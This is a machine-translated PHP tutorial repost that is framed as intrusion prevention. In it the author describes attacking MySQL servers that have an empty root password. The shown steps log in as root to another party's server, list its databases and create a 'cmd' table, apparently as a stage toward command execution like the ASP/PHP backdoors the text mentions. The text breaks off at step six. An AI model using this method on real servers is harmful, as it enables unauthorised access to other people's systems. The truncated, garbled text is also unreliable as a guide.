Home > Backend Development > PHP Tutorial > How to prevent intrusions: A complete list of My SQL attack methods_PHP tutorial

How to prevent intrusions: A complete list of My SQL attack methods_PHP tutorial

WBOY
Release: 2016-07-13 17:02:30
Original
958 people have browsed it

MYSQLIt is a big vulnerability when the user ROOT password is empty. There are many ways to exploit this vulnerability on the Internet. Generally, it is to write an ASP or PHP is not only very troublesome, but also requires guessing the directory of the website. If the other party does not open IIS, then we are helpless? ?
Later, I thought about a method and succeeded in testing several machines with this vulnerability. The attack method is now announced as follows:


1. Connect to the other party's MYSQL Server


mysql -u root -h 192.168.0.1


mysql.exe This program is in the BIN directory where you installed MYSQL


2. Let’s take a look What databases are there in the server?


mysql>show databases;


When MYSQL is installed by default, there are two databases, MYSQL and TEST. If you see other databases, they are built by the user. database.


3. Let us enter the database


mysql>use test;


We will enter the test database


4. Check out some of the things we entered in the database What data table


mysql>show tables;


By default, no table exists in test.


The following are the key parts


5. Create a new table under the TEST database;


mysql>create table a (cmd text);


Okay, we have created a new table named a. There is only one field stored in the table. The field name is cmd, which is text.


6. Insert content into the table





http://www.bkjia.com/PHPjc/631041.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/631041.htmlTechArticleWhen the MYSQL user ROOT password is empty, it is a big vulnerability. There are many ways to exploit this vulnerability on the Internet. , usually just writing an ASP or PHP backdoor, which is not only very troublesome, but also...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template